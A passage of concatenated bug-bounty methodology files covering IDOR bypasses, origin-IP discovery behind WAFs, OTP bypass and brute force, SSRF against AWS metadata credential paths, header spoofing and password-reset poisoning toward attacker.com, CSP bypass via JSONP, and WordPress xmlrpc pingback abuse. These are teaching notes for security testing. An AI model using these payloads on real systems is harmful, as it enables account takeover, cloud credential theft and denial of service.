following questions:*** 13 | 14 | - Does the ID belong to a private resource? (e.g /api/user/123/news vs /api/user/123/transaction) 15 | - What are the IDs that belong to me? 16 | - What are the different possible roles in the API?(For example — user, driver, supervisor, manager) 17 | 18 | ## Bypassing Object Level Authorization: 19 | 20 | - Add parameters onto the endpoints for example, if there was 21 | 22 | ```html 23 | GET /api_v1/messages --> 401 24 | vs 25 | GET /api_v1/messages?user_id=victim_uuid --> 200 26 | ``` 27 | 28 | - HTTP Parameter pollution 29 | 30 | ```html 31 | GET /api_v1/messages?user_id=VICTIM_ID --> 401 Unauthorized 32 | GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID --> 200 OK 33 | 34 | GET /api_v1/messages?user_id=YOUR_USER_ID[]&user_id=ANOTHER_USERS_ID[] 35 | ``` 36 | 37 | - Add .json to the endpoint, if it is built in Ruby! 38 | 39 | ```html 40 | /user_data/2341 --> 401 Unauthorized 41 | /user_data/2341.json --> 200 OK 42 | ``` 43 | 44 | - Test on outdated API Versions 45 | 46 | ```html 47 | /v3/users_data/1234 --> 403 Forbidden 48 | /v1/users_data/1234 --> 200 OK 49 | ``` 50 | 51 | * Wrap the ID with an array. 52 | 53 | ```html 54 | {“id”:111} --> 401 Unauthriozied 55 | {“id”:[111]} --> 200 OK 56 | ``` 57 | 58 | * Wrap the ID with a JSON object: 59 | 60 | ```html 61 | {“id”:111} --> 401 Unauthriozied 62 | 63 | {“id”:{“id”:111}} --> 200 OK 64 | ``` 65 | 66 | * JSON Parameter Pollution: 67 | 68 | ```html 69 | POST /api/get_profile 70 | Content-Type: application/json 71 | {“user_id”:,”user_id”:} 72 | ``` 73 | 74 | - Try to send a wildcard(*) instead of an ID. It’s rare, but sometimes it works. 75 | - If it is a number id, be sure to test through a large amount of numbers, instead of just guessing 76 | - If endpoint has a name like /api/users/myinfo, check for /api/admins/myinfo 77 | - Replace request method with GET/POST/PUT 78 | - Use burp extension autorize 79 | - If none of these work, get creative and ask around! 80 | 81 | ## Escalating/Chaining with IDOR's Ideas: 82 | 83 | 1. Lets say you find a low impact IDOR, like changing someone elses name, chain that with XSS and you have stored XSS! 84 | 2. If you find IDOR on and endpoint, but it requires UUID, chain with info disclosure endpoints that leak UUID, and bypass this! 85 | 3. If none of these work, get creative and ask around! 86 | 87 | ### Reference 88 | [https://twitter.com/swaysThinking/status/1301663848223715328](https://twitter.com/swaysThinking/status/1301663848223715328) 89 | 90 | ### Reports (Hackerone) 91 | 92 | #### Resolved 93 | 94 | - [IDOR to delete images from other stores](https://hackerone.com/reports/404797) 95 | - [IDOR in changing shared file name](https://hackerone.com/reports/547663) 96 | - [User uploaded portfolio files can be accessed by any user even after deleted](https://hackerone.com/reports/300179) 97 | - [IDOR and statistics leakage in Orders](https://hackerone.com/reports/544329) 98 | - [I.D.O.R To Order,Book,Buy,reserve On YELP FOR FREE (UNAUTHORIZED USE OF OTHER USER'S CREDIT CARD)](https://hackerone.com/reports/391092) 99 | - [IDOR allow access to payments data of any user](https://hackerone.com/reports/751577) 100 | - [IDOR allow to extract all registered email](https://hackerone.com/reports/302485) 101 | - [IDOR at https://account.mackeeper.com/at/load-reports/profile/ leaks information about devices/licenses](https://hackerone.com/reports/783117) 102 | - [IDOR bug to See hidden slowvote of any user even when you dont have access right](https://hackerone.com/reports/661978) 103 | - [IDOR on update user preferences](https://hackerone.com/reports/854290) 104 | - [idor on upload profile functionality](https://hackerone.com/reports/741683) 105 | - [IDOR to view User Order Information](https://hackerone.com/reports/287789) 106 | - [IDOR with Geolocation data not stripped from images](https://hackerone.com/reports/906907) 107 | - [Replace other user files in Inbox messages](https://hackerone.com/reports/322661) 108 | 109 | ### Author 110 | 111 | * [@harsha0x01](https://twitter.com/harsha0x01) 112 | * [@klaus](https://twitter.com/klaus_dev) 113 | -------------------------------------------------------------------------------- /FindOriginIP/FindOrigin.md: -------------------------------------------------------------------------------- 1 | # Finding Origin IPs Behind WAFs 2 | 3 | ## Introduction 4 | 5 | Web Application Firewalls (WAFs) like Cloudflare, AWS WAF, and others protect web applications by filtering and monitoring HTTP traffic. However, discovering the origin IP address behind these protective layers can be crucial during security assessments. This guide outlines various techniques to identify origin IPs. 6 | 7 | ## Identifying the Presence of a WAF 8 | 9 | Before attempting to bypass a WAF, first confirm its presence: 10 | 11 | ```bash 12 | # Get the IP address 13 | dig +short example.com 14 | 15 | # Check the organization 16 | curl -s https://ipinfo.io/IP | jq -r '.org' 17 | ``` 18 | 19 | **Common WAF Indicators:** 20 | - AWS WAF: Look for "AWSLB" and "AWSLBCORS" cookies 21 | - Cloudflare: Organization info will indicate Cloudflare, Inc. 22 | - Other WAFs may have specific signatures or response headers 23 | 24 | ## Techniques for Origin IP Discovery 25 | 26 | ### 1. Historical DNS Records 27 | 28 | Historical DNS records often reveal IPs used before WAF implementation: 29 | 30 | - **SecurityTrails DNS History** 31 | - Visit: https://securitytrails.com/domain/example.com/dns 32 | - Export historical A records 33 | - Extract IPs: 34 | ```bash 35 | grep -E -o "([0-9]{1,3}[\\.]){3}[0-9]{1,3}" dns_history.txt | sort -u > potential_ips.txt 36 | ``` 37 | 38 | - **DNS Dumpster** 39 | - Use https://dnsdumpster.com to generate network maps 40 | - Look for non-WAF IP addresses in the results 41 | 42 | ### 2. Subdomain Enumeration 43 | 44 | Development or staging environments often lack proper WAF protection: 45 | 46 | ```bash 47 | # Find subdomains and their IPs 48 | subfinder -silent -d example.com | dnsprobe -silent | awk '{ print $2 }' | sort -u > subdomain_ips.txt 49 | ``` 50 | 51 | Focus on subdomains like: 52 | - dev.example.com 53 | - staging.example.com 54 | - test.example.com 55 | - beta.example.com 56 | 57 | ### 3. SSL Certificate Information 58 | 59 | Certificates often reveal all domains and IPs where they're deployed: 60 | 61 | - **Censys Method**: 62 | 1. Search for certificates using your target domain 63 | 2. Select "Certificates" in the input field and search for your domain 64 | 3. Review each certificate and click "Explore" > "IPv4 Hosts" 65 | 4. Collect all associated IPs 66 | 67 | - **Shodan Method**: 68 | ``` 69 | # Search by Common Name (CN) 70 | ssl.cert.subject.CN:"example.com" 71 | 72 | # Search in all certificate fields (broader) 73 | ssl:"example.com" 74 | ``` 75 | 76 | **Note:** Verify results manually as they may include CDN/proxy IPs. SAN (Subject Alternative Name) fields are generally more reliable than CN. 77 | 78 | ### 4. Direct IP Testing 79 | 80 | For each potential IP, test if it responds to the target hostname: 81 | 82 | ```bash 83 | # Test single IP 84 | curl -s -k -H "Host: example.com" https://POTENTIAL_IP/ 85 | 86 | # Test multiple IPs 87 | for ip in $(cat potential_ips.txt); do 88 | org=$(curl -s https://ipinfo.io/$ip | jq -r '.org') 89 | title=$(timeout 2 curl -s -k -H "Host: example.com" https://$ip/ | pup 'title text{}') 90 | echo "IP: $ip | Title: $title | Org: $org" 91 | done 92 | ``` 93 | 94 | ### 5. Email Headers Analysis 95 | 96 | Emails from the target domain often contain internal IP information: 97 | 98 | 1. Trigger emails from the target (register, password reset, newsletters) 99 | 2. Examine email headers, particularly: 100 | - Return-Path 101 | - Received 102 | - X-Originating-IP 103 | 104 | ### 6. Specialized Tools 105 | 106 | Several tools automate origin IP discovery: 107 | 108 | - **CloudFail**: 109 | ```bash 110 | git clone https://github.com/m0rtem/CloudFail.git 111 | cd CloudFail 112 | pip install -r requirements.txt 113 | python3 cloudfail.py -t example.com 114 | ``` 115 | 116 | - **CloudFlair**: 117 | ```bash 118 | git clone https://github.com/christophetd/CloudFlair 119 | cd CloudFlair 120 | pip install -r requirements.txt 121 | python3 cloudflair.py example.com 122 | ``` 123 | 124 | ## Verifying the Origin IP 125 | 126 | After discovering potential origin IPs, verify them: 127 | 128 | 1. Compare response content with the WAF-protected site 129 | 2. Look for server fingerprints (headers, error pages) 130 | 3. Check for administrative interfaces or panels not accessible via WAF 131 | 132 | ## Best Practices 133 | 134 | - Combine multiple techniques for better results 135 | - Document all discovered IPs and their verification status 136 | - Check IP ranges belonging to the organization 137 | - Consider timing your requests to avoid rate limiting 138 | 139 | ## References 140 | 141 | - [Navisec: A Pentester's Guide - Unmasking WAFs and Finding the Source](https://delta.navisec.io/a-pentesters-guide-part-5-unmasking-wafs-and-finding-the-source/) 142 | - [Detectify: Bypassing Cloudflare WAF with the Origin Server IP Address](https://blog.detectify.com/2019/07/31/bypassing-cloudflare-waf-with-the-origin-server-ip-address/) 143 | 144 | ## Credits 145 | 146 | ### Original Author 147 | * [maverickNerd](https://x.com/maverickNerd) 148 | 149 | ### Contributors 150 | * [nagarajcruze](https://github.com/nagarajcruze) 151 | * [www](https://github.com/www) 152 | 153 | --- 154 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)* 155 | -------------------------------------------------------------------------------- /Authentication_Bypass/OTP_Bypass.md: -------------------------------------------------------------------------------- 1 | # **OTP Bypass Techniques in Account Registration and Authentication** 2 | 3 | ## **Introduction** 4 | One-Time Passwords (OTP) are commonly used for authentication and verification in account registration, login, and critical actions. However, poor OTP implementations can lead to **authentication bypass, account takeover, and unauthorized access**. 5 | 6 | This document outlines **various OTP bypass techniques**, including **response manipulation, rate limit exploitation, default OTP usage, and session validation flaws**. 7 | 8 | --- 9 | 10 | ## **OTP Bypass via Response Manipulation** 11 | ### **Method 1: Manipulating OTP Verification Response** 12 | #### **Steps:** 13 | 1. Register an account with a mobile number and request an OTP. 14 | 2. Enter an **incorrect OTP** and capture the request using **Burp Suite**. 15 | 3. Intercept and **modify the server's response**: 16 | - Original response: 17 | ```json 18 | {"verificationStatus":false,"mobile":9072346577,"profileId":"84673832"} 19 | ``` 20 | - Change to: 21 | ```json 22 | {"verificationStatus":true,"mobile":9072346577,"profileId":"84673832"} 23 | ``` 24 | 4. Forward the manipulated response. 25 | 5. The system authenticates the account despite the incorrect OTP. 26 | 27 | **Impact:** 28 | - **Full account takeover** without providing a valid OTP. 29 | 30 | --- 31 | 32 | ### **Method 2: Changing Error Response to Success** 33 | #### **Steps:** 34 | 1. Go to the **login page** and enter your phone number. 35 | 2. When prompted for an OTP, enter an **incorrect OTP**. 36 | 3. Capture the **server response**: 37 | ```json 38 | { "error": "Invalid OTP" } 39 | ``` 40 | 4. Modify it to: 41 | ```json 42 | { "success": "true" } 43 | ``` 44 | 5. Forward the response. 45 | 6. If the server accepts this modification, you gain access without entering a valid OTP. 46 | 47 | **Impact:** 48 | - **Authentication bypass leading to account takeover**. 49 | 50 | --- 51 | 52 | ### **Method 3: OTP Verification Across Multiple Accounts** 53 | #### **Steps:** 54 | 1. Register **two different accounts** with separate phone numbers. 55 | 2. **Enter the correct OTP** for one account and intercept the request. 56 | 3. Capture the server response and note **status:1** (success). 57 | 4. Now, attempt to verify the second account with an **incorrect OTP**. 58 | 5. Intercept the server response where the status is **status:0** (failure). 59 | 6. Change **status:0** to **status:1** and forward the response. 60 | 7. If successful, you bypass OTP authentication. 61 | 62 | **Impact:** 63 | - **Bypassing OTP verification for multiple accounts**. 64 | 65 | --- 66 | 67 | ## **OTP Bypass Using Form Resubmission in Repeater** 68 | #### **Steps:** 69 | 1. Register an account using a **non-existent phone number**. 70 | 2. Intercept the OTP request in **Burp Suite**. 71 | 3. Send the request to **Repeater** and forward it. 72 | 4. Modify the phone number in the request to **your real number**. 73 | 5. If the system **sends the OTP to your real number**, use it to register under the **fake number**. 74 | 75 | **Impact:** 76 | - **Unauthorized account registration using someone else's OTP**. 77 | 78 | --- 79 | 80 | ## **Bypassing OTP with No Rate Limiting** 81 | ### **Steps:** 82 | 1. **Create an account** and request an OTP. 83 | 2. Enter an **incorrect OTP** and capture the request in Burp Suite. 84 | 3. Send the request to **Burp Intruder** and **set a payload on the OTP field**. 85 | 4. Set **payload type as numbers** (`000000` to `999999`). 86 | 5. Start the attack. 87 | 6. If **no rate limit** is enforced, the correct OTP will eventually match. 88 | 89 | **Impact:** 90 | - **Complete OTP bypass through brute force**. 91 | 92 | --- 93 | 94 | ## **Additional OTP Bypass Test Cases** 95 | ### **1. Default OTP Values** 96 | - Some applications use default OTP values such as: 97 | ``` 98 | 111111, 123456, 000000 99 | ``` 100 | - Test common default values to check for misconfigurations. 101 | 102 | ### **2. OTP Leakage in Server Response** 103 | - Some applications leak OTPs in API responses. 104 | - **Intercept OTP request responses** and check if OTP is present. 105 | 106 | ### **3. Checking if Old OTP is Still Valid** 107 | - Some systems allow the **reuse of old OTPs**. 108 | - Test if **previously used OTPs** are still accepted. 109 | 110 | --- 111 | 112 | ## **Rate Limiting Attack on OTP Verification** 113 | ### **Steps:** 114 | 1. **Navigate to the OTP verification endpoint**: 115 | ``` 116 | https://abc.target.com/verify/phoneno 117 | ``` 118 | 2. Enter an **invalid OTP** (e.g., `000000`). 119 | 3. **Intercept the request** and send it to **Intruder**. 120 | 4. Set the **OTP field as the payload position**. 121 | 5. Use **payload type: numbers** and define a **range (000000 - 999999)**. 122 | 6. Start the attack. 123 | 7. Identify a **response length change**, which may indicate the correct OTP. 124 | 125 | **Impact:** 126 | - **Brute-force attack leading to OTP bypass and account takeover**. 127 | 128 | --- 129 | 130 | ## **Contributors** 131 | - **[@akshaykerkar13](https://twitter.com/akshaykerkar13)** 132 | - **[@Yn0tWhy](https://twitter.com/Yn0tWhy)** 133 | - **[@Virdoex_hunter](https://twitter.com/Virdoex_hunter)** 134 | - **[@febinrev](https://twitter.com/febinrev)** 135 | - **[@fani_malik](https://twitter.com/fanimalikhack)** 136 | - **[@v3daxt](https://twitter.com/v3daxt)** 137 | - **[@prakhar0x01](https://twitter.com/prakhar0x01)** 138 | 139 | --- 140 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)* 141 | -------------------------------------------------------------------------------- /SSRF/SSRF-old.md: -------------------------------------------------------------------------------- 1 | # SSRF ( Server-Side-Request-Forgery) 2 | * What's SSRF ?? 3 | * SSRF is a type of exploit where an attacker abuses the functionality of a server causing it to access or manipulate information in the realm of that server that would otherwise not be directly accessible to the attacker. 4 | 5 | ## Where to look for ?? 6 | 7 | 1. If you got Open Redirect try escalating it to SSRF. 8 | 9 | 2. gf SSRF to grep parameters may vulnerable to SSRF. 10 | 11 | 3. SSRF's are more in API's so crawl the whole web app with burp proxy turned on and search for keywords like., eg : 12 | ``` 13 | ?url= 14 | ?uri= 15 | ?req= 16 | etc..... 17 | ``` 18 | 4. Sign up with an Email like blabla.collaborator.net. If u receive HTTP req. in collaborator then its SSRF. But if there's no impact Don't Report it :) DNS and SMTP req. Doesn't matters. 19 | 20 | ## AWS Metadata 21 | Most of the sites use AWS nowadays... 22 | 23 | * AWS localhost is 169.254.169.254 so don't use 127.0.0.1 there! 24 | 25 | * If you found an SSRF vulnerability that runs on EC2, try requesting : 26 | ``` 27 | http://169.254.169.254/latest/meta-data/ 28 | http://169.254.169.254/latest/user-data/ 29 | http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE 30 | http://169.254.169.254/latest/meta-data/iam/security-credentials/flaws/ 31 | ``` 32 | * Source: https://twitter.com/ADITYASHENDE17/status/1305051512335298562 33 | 34 | ## Escalation 35 | 36 | * SSRF can be Escalated to RCE :) [Impact High] 37 | * ``.collaborator.net (thehackerish has a good video in it :) 38 | * If there's no impact! on your SSRF rather than a redirect try to escalate it to XSS. 39 | 40 | ## Resources 💯 41 | ### Youtube 42 | * https://www.youtube.com/watch?v=U0bPPw6uPgY&t=1s 43 | * https://www.youtube.com/watch?v=324cZic6asE 44 | * https://www.youtube.com/watch?v=o-tL9ULF0KI 45 | * https://www.youtube.com/watch?v=324cZic6asE&t=751s 46 | * https://youtu.be/m4BxIf9PUx0 47 | * https://youtu.be/apzJiaQ6a3k 48 | * [A New Era of SSRF](https://www.youtube.com/watch?v=R9pJ2YCXoJQ) by [Orange Tsai](https://blog.orange.tw/) 49 | 50 | ### Hackerone Reports 51 | * https://hackerone.com/hacktivity?order_field=popular&filter=type%3Apublic&querystring=SSRF 52 | * https://hackerone.com/reports/737161 53 | * https://hackerone.com/reports/816848 54 | * https://hackerone.com/reports/398799 55 | * https://hackerone.com/reports/382048 56 | * https://hackerone.com/reports/406387 57 | * https://hackerone.com/reports/736867 58 | * https://hackerone.com/reports/517461 59 | * https://hackerone.com/reports/508459 60 | * https://hackerone.com/reports/738553 61 | * https://hackerone.com/reports/514224 62 | * https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF 63 | * https://hackerone.com/reports/341876 64 | * https://hackerone.com/reports/793704 65 | * https://hackerone.com/reports/386292 66 | * https://hackerone.com/reports/326040 67 | * https://hackerone.com/reports/310036 68 | * https://hackerone.com/reports/643622 69 | * https://hackerone.com/reports/885975 70 | * https://hackerone.com/reports/207477 71 | * https://hackerone.com/reports/514224 72 | 73 | ### Blogs 74 | * https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978 75 | * https://medium.com/@kapilvermarbl/ssrf-server-side-request-forgery-5131ffd61c3c 76 | * https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326 77 | * https://medium.com/@chawdamrunal/what-is-server-side-request-forgery-ssrf-7cd0ead0d95f 78 | * https://medium.com/swlh/ssrf-in-the-wild-e2c598900434 79 | * https://medium.com/@briskinfosec/ssrf-server-side-request-forgery-ae44ec737cb8 80 | * https://medium.com/@GAYA3_R/vulnerability-server-side-request-forgery-ssrf-9fe5428184c1 81 | * https://medium.com/@gupta.bless/exploiting-ssrf-for-admin-access-31c30457cc44 82 | * https://medium.com/bugbountywriteup/server-side-request-forgery-ssrf-f62235a2c151 83 | * https://medium.com/@dlpadmavathi.us/ssrf-attack-real-example-a7279256abee 84 | * https://blog.securityinnovation.com/the-many-faces-of-ssrf 85 | * https://www.netsparker.com/blog/web-security/server-side-request-forgery-vulnerability-ssrf/ 86 | * http://www.techpna.com/uptzh/blind-ssrf-medium.html 87 | * https://blog.appsecco.com/finding-ssrf-via-html-injection-inside-a-pdf-file-on-aws-ec2-214cc5ec5d90 88 | * http://institutopaideia.com.br/journal/blind-ssrf-medium-cfa769 89 | * https://www.reddit.com/r/bugbounty/comments/cux2zs/ssrf_in_the_wild_the_startup_medium/ 90 | * https://www.sonrn.com.br/blog/5a44cc-blind-ssrf-medium 91 | * https://ssrf-bypass-medium.thickkare.pw/ 92 | * https://hackerone.com/reports/326040 93 | * https://www.zerocopter.com/vulnerabilities-price-list-printable 94 | * https://medium.com/swlh/intro-to-ssrf-beb35857771f 95 | * https://medium.com/poka-techblog/server-side-request-forgery-ssrf-attacks-part-1-the-basics-a42ba5cc244a 96 | * https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-3-b0f5997e3739 97 | * https://medium.com/bugbountywriteup/server-side-request-forgery-ssrf-testing-b9dfe57cca35 98 | * https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2-a085ec4332c0 99 | * https://medium.com/bugbountywriteup/tagged/ssrf 100 | * https://medium.com/seconset/all-about-ssrf-524f41ab96df 101 | * https://blog.cobalt.io/from-ssrf-to-port-scanner-3e8ef5921fbf 102 | * https://portswigger.net/web-security/ssrf 103 | * https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery 104 | 105 | ### Github Repos 106 | * https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery 107 | * https://github.com/jdonsec/AllThingsSSRF 108 | 109 | ### Author: 110 | * [@0xCyberPirate](https://twitter.com/0xCyberPirate) 111 | * [0xrtt](https://twitter.com/0xrtt) 112 | -------------------------------------------------------------------------------- /WAF_Bypasses/WAF_Bypass_Using_headers.md: -------------------------------------------------------------------------------- 1 | # **WAF Bypass Using Headers (Password Reset Poisoning)** 2 | 3 | ## **Introduction** 4 | Web Application Firewalls (WAFs) are commonly used to filter and monitor HTTP traffic to protect web applications from attacks. However, attackers can bypass WAFs by **manipulating HTTP headers**. One such attack involves **Password Reset Poisoning**, where an attacker leverages forged headers to manipulate the behavior of the application, particularly in password reset functionalities. 5 | 6 | This document outlines techniques to **bypass WAFs** using custom headers, including examples of how they can be used in **password reset poisoning** and other similar attacks. 7 | 8 | --- 9 | 10 | ## **How Does WAF Header Manipulation Work?** 11 | Many web applications rely on **HTTP headers** to determine a user's origin, session, or intended destination. By modifying these headers, an attacker can: 12 | - Trick the application into believing the request is coming from a trusted source. 13 | - Redirect password reset links to an attacker's domain. 14 | - Bypass security measures by manipulating `X-Forwarded-For`, `Referer`, or `Origin` headers. 15 | - Spoof a legitimate user by injecting headers used for authentication. 16 | 17 | Some applications also have misconfigured **reverse proxies**, which trust certain headers to determine the client’s IP address, allowing **internal access** through header manipulation. 18 | 19 | --- 20 | 21 | ## **Common Headers Used for WAF Bypass** 22 | Below are the most commonly used headers for WAF bypass and server-side manipulation: 23 | 24 | ``` 25 | X-Forwarded-Host: attacker.com 26 | X-Forwarded-Port: 443 27 | X-Forwarded-Scheme: https 28 | Origin: null 29 | nullOrigin: [siteDomain].attacker.com 30 | X-Frame-Options: Allow 31 | X-Forwarded-For: 127.0.0.1 32 | X-Client-IP: 127.0.0.1 33 | Client-IP: 127.0.0.1 34 | Proxy-Host: 127.0.0.1 35 | Request-Uri: 127.0.0.1 36 | X-Forwarded: 127.0.0.1 37 | X-Forwarded-By: 127.0.0.1 38 | X-Forwarded-For: 127.0.0.1 39 | X-Forwarded-For-Original: 127.0.0.1 40 | X-Forwarded-Host: 127.0.0.1 41 | X-Forwarded-Server: 127.0.0.1 42 | X-Forwarder-For: 127.0.0.1 43 | X-Forward-For: 127.0.0.1 44 | Base-Url: 127.0.0.1 45 | Http-Url: 127.0.0.1 46 | Proxy-Url: 127.0.0.1 47 | Redirect: 127.0.0.1 48 | Real-Ip: 127.0.0.1 49 | Referer: 127.0.0.1 50 | Referrer: 127.0.0.1 51 | Refferer: 127.0.0.1 52 | Uri: 127.0.0.1 53 | Url: 127.0.0.1 54 | X-Host: 127.0.0.1 55 | X-Http-Destinationurl: 127.0.0.1 56 | X-Http-Host-Override: 127.0.0.1 57 | X-Original-Remote-Addr: 127.0.0.1 58 | X-Original-Url: 127.0.0.1 59 | X-Proxy-Url: 127.0.0.1 60 | X-Rewrite-Url: 127.0.0.1 61 | X-Real-Ip: 127.0.0.1 62 | X-Remote-Addr: 127.0.0.1 63 | X-Custom-IP-Authorization: 127.0.0.1 64 | X-Originating-IP: 127.0.0.1 65 | X-Remote-IP: 127.0.0.1 66 | X-Original-Url: 67 | X-Forwarded-Server: 68 | X-Host: 69 | X-Forwarded-Host: 70 | X-Rewrite-Url: 71 | ``` 72 | 73 | --- 74 | 75 | ## **Practical Attack Scenario: Password Reset Poisoning** 76 | ### **Step 1: Identifying the Vulnerability** 77 | - Many web applications send password reset links based on the **Host** or **Origin** headers. 78 | - If these headers are **not validated properly**, an attacker can **poison** the password reset URL. 79 | 80 | ### **Step 2: Sending a Manipulated Request** 81 | **Example Request:** 82 | ```http 83 | POST /reset-password HTTP/1.1 84 | Host: victim-site.com 85 | X-Forwarded-Host: attacker.com 86 | X-Forwarded-For: 127.0.0.1 87 | X-Real-IP: 127.0.0.1 88 | Content-Type: application/x-www-form-urlencoded 89 | 90 | email=victim@victim.com 91 | ``` 92 | 93 | ### **Step 3: Intercepting the Response** 94 | If the server does not validate the `X-Forwarded-Host` header, it might send a **password reset link to the victim** that looks like this: 95 | 96 | ``` 97 | https://attacker.com/reset?token=abcdef123456 98 | ``` 99 | 100 | Now, when the victim clicks on the reset link, they will be redirected to the attacker's site, where their credentials can be **stolen via phishing**. 101 | 102 | --- 103 | 104 | ## **Other Uses of WAF Header Manipulation** 105 | ### **1. Bypassing IP-Based Restrictions** 106 | - Some web applications **block access** based on the user’s IP address. 107 | - If the WAF **trusts headers** like `X-Forwarded-For`, an attacker can **spoof their IP** and gain access. 108 | 109 | **Example Request:** 110 | ```http 111 | GET /admin HTTP/1.1 112 | Host: target.com 113 | X-Forwarded-For: 192.168.1.100 114 | ``` 115 | - If `192.168.1.100` is a **trusted internal IP**, access will be granted. 116 | 117 | --- 118 | 119 | ### **2. Exploiting Open Redirects** 120 | Some applications use `Referer`, `Redirect`, or `X-Forwarded-Host` to construct redirect URLs. 121 | 122 | **Example Request:** 123 | ```http 124 | GET /login?redirect=https://victim.com HTTP/1.1 125 | Host: target.com 126 | X-Forwarded-Host: attacker.com 127 | ``` 128 | - The victim is redirected to a phishing page **hosted by the attacker**. 129 | 130 | --- 131 | 132 | ### **3. SSRF (Server-Side Request Forgery) Exploitation** 133 | Some applications **fetch remote resources** based on user input. By modifying headers, an attacker can: 134 | - Force the application to fetch **internal resources**. 135 | - Target **AWS metadata services** or other sensitive internal services. 136 | 137 | **Example Request:** 138 | ```http 139 | GET /api/v1/fetch HTTP/1.1 140 | Host: target.com 141 | X-Forwarded-For: 169.254.169.254 142 | X-Real-IP: 169.254.169.254 143 | ``` 144 | - If the application fetches the resource using these headers, it could **leak AWS credentials** or **internal system information**. 145 | 146 | --- 147 | 148 | ## **Author** 149 | - **[Virdoex_hunter](https://twitter.com/Virdoex_hunter)** 150 | - **[remonsec](https://x.com/remonsec)** 151 | 152 | --- 153 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)* 154 | -------------------------------------------------------------------------------- /XSS/Bypass_CSP.md: -------------------------------------------------------------------------------- 1 | # Content Security Policy (CSP) 2 | 3 | ## What is CSP? 4 | 5 | Content Security Policy (CSP) is a security mechanism that defines which resources can be fetched or executed by a web page. It acts as a security policy that controls which scripts, images, and iframes can be executed on a specific page and from which sources. CSP is implemented using response headers or meta elements within an HTML page. Once implemented, the browser enforces the policy and actively blocks any violations detected. 6 | 7 | --- 8 | 9 | ## How Does CSP Work? 10 | 11 | CSP works by restricting the sources from which active and passive content can be loaded. Additionally, it enforces security policies such as preventing the execution of inline JavaScript, disabling the use of `eval()`, and limiting resource loading to specific origins. 12 | 13 | --- 14 | 15 | ## Defining CSP Rules 16 | 17 | The following example illustrates a CSP configuration: 18 | 19 | ```plaintext 20 | default-src 'none'; 21 | img-src 'self'; 22 | script-src 'self' https://code.jquery.com; 23 | style-src 'self'; 24 | report-uri /__cspreport__; 25 | font-src 'self' https://addons.cdn.mozilla.net; 26 | frame-src 'self' https://ic.paypal.com https://paypal.com; 27 | media-src https://videos.cdn.mozilla.net; 28 | object-src 'none'; 29 | ``` 30 | 31 | --- 32 | 33 | ## Key CSP Directives 34 | 35 | Below are some important CSP directives and their functions: 36 | 37 | 1. **script-src:** Defines allowed sources for JavaScript execution, including inline scripts and external script files. 38 | 2. **default-src:** Sets the default policy for resource loading when specific fetch directives are not defined. 39 | 3. **child-src:** Controls allowed sources for web workers and embedded frames. 40 | 4. **connect-src:** Restricts URLs used in interfaces such as `fetch`, `WebSocket`, and `XMLHttpRequest`. 41 | 5. **frame-src:** Defines allowed sources for `` and ` 83 | ``` 84 | 85 | --- 86 | 87 | ### 2. JSONP-Based CSP Bypass 88 | 89 | JSONP (JSON with Padding) is a technique used to bypass the Same-Origin Policy (SOP) by injecting JavaScript payloads into API responses. If a JSONP endpoint is included in the `script-src` policy, it can be exploited to inject malicious scripts. 90 | 91 | Example JSONP endpoint: 92 | 93 | ```plaintext 94 | https://accounts.google.com/o/oauth2/revoke?callback=alert(1337) 95 | ``` 96 | 97 | If a CSP policy includes `accounts.google.com` in the `script-src` directive, an attacker can exploit it as follows: 98 | 99 | ```plaintext 100 | something.example.com?vuln_param=https://accounts.google.com/o/oauth2/revoke?callback=alert(1337) 101 | ``` 102 | 103 | This allows JavaScript execution from an external source, effectively bypassing CSP. 104 | 105 | --- 106 | 107 | ### 3. CSP Injection 108 | 109 | CSP injection occurs when user-controlled input is reflected in the CSP header. Consider the following vulnerable URL: 110 | 111 | ```plaintext 112 | example.com?vuln=something_vuln_csp 113 | ``` 114 | 115 | If the value of `vuln` is directly inserted into the CSP header, an attacker can manipulate the policy: 116 | 117 | ```plaintext 118 | script-src something_vuln_csp; 119 | object-src 'none'; 120 | base-uri 'none'; 121 | require-trusted-types-for 'script'; 122 | report-uri https://csp.example.com; 123 | ``` 124 | 125 | By modifying the `script-src` directive, an attacker can include a malicious domain, allowing external JavaScript execution. 126 | 127 | --- 128 | 129 | ## Author 130 | 131 | For further information or discussions, feel free to reach out to: 132 | 133 | - **[@harsha0x01](https://twitter.com/harsha0x01)** 134 | 135 | --- 136 | 137 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)* 138 | -------------------------------------------------------------------------------- /CMS/wordpress.md: -------------------------------------------------------------------------------- 1 | # Wordpress Common Misconfiguration 2 | Here I will try my best to mention all common security misconfigurations for Wordpress I saw before or officially referenced. I will be attaching all poc and reference as well 3 | 4 | # Index 5 | * Wordpress Detection 6 | * General Scan Tool 7 | * xmlrpc.php 8 | * Directory listing 9 | * CVE-2018-6389 10 | * CVE-2021-24364 11 | * WP Cornjob DOS 12 | * WP User Enumeration 13 | 14 | # Wordpress Detection 15 | Well, if you are reading this you already know about technology detection tool and methods. 16 | Still adding them below 17 | * Wappalyzer 18 | * WhatRuns 19 | * BuildWith 20 | 21 | # Geneal Scan Tool 22 | * WpScan 23 | 24 | # xmlrpc.php 25 | This is one of the common issue on wordpress. To get some bucks with this misconfiguration you must have to exploit it fully, and have to show the impact properly as well. 26 | 27 | ### Detection 28 | * visit site.com/xmlrpc.php 29 | * Get the error message about POST request only 30 | 31 | ### Exploit 32 | * Intercept the request and change the method GET to POST 33 | * List all Methods 34 | ``` 35 | 36 | system.listMethods 37 | 38 | 39 | ``` 40 | * Check the ```pingback.ping``` mentod is there or not 41 | * Perform DDOS 42 | ``` 43 | 44 | pingback.ping 45 | 46 | http://: 47 | http:// 48 | 49 | 50 | ``` 51 | * Perform SSRF (Internal 